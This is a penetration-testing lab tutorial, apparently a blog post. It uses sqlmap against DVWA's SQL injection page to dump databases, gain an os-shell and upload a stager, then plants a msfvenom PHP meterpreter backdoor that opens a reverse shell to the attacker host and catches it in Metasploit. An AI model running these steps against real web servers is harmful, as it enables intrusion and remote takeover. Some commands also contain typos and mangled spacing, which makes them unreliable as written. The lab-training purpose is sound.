This article is exactly same as previous article; today I will make use of sqlmap to upload backdoor filein DVWA suffering from sql injection vulnerbility.
Kali Linux: Burp suite, sqlmap tool
Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here
Now open the DVWA in your pc and login with following credentials:
Username – admin
Password – password
Click on DVWA Security and set Website Security Level low
From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box. Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.
Turn on burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Burp suit will provide” cookie” and “referrer” under fetched data which will later use in sqlmap commands.
In following Sqlmap will analysis the url for making connection from target and then use sql queries for given cookies to fetch all names of database.
sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” –cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0″ –dbs
So if you notice image given below it has dumb all name of database. Choose dvwa to upload php backdoor.
Now Type following command to run sqlmap to access os-shell of web server (dvwa)
sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” –cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0″ -D dvwa –os-shell
It will try to generate a backdoor; I want to create PHP backdoor in target pc therefore type 4 for PHP payload and then Type 4 for brute force search to use as writable directory to upload it.
It is trying to upload the file on “/xampp/htdocs/” by using different sql injection techniques. As soon as file is uploaded; it will send INFO the file stager has been successfully uploaded on “/xampp/htdocs/”and you will get os-shell of victim pc. Other than here it also shows the path where
you can manually upload your backdoor, look at over highlighted URL:
Explore the URL:http://192.168.0.102/tmpunais.php on browser. From screenshot you can read the heading of web page sqlmap file uploader which will let you to browse you backdoor on web server(dvwa) and will later upload that backdoor to following directory (“/xampp/htdocs/” )of web server.
Let’s prepare the malicious file that you would upload with msfvenom :
msfvenom -p php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw.
copy the code from <?php to die() and save it in a file with .php extension. I have saved the backdoor as shell.php on desktop and will later browser this file to upload on web server.
Now load metasploit framework by typing msfconsole and start multi/handler
Click on browse to select your shell.php file and then click on upload.
GREAT!!! Here it shows Admin File is uploaded which means backdoor shell.php is uploaded.
To execute backdoor on target pc run URL:192.168.0.102/shell.php on browser and you will receive reverse connection to multi/handler.
msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
Divine!!! meterpreter session is opened .
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here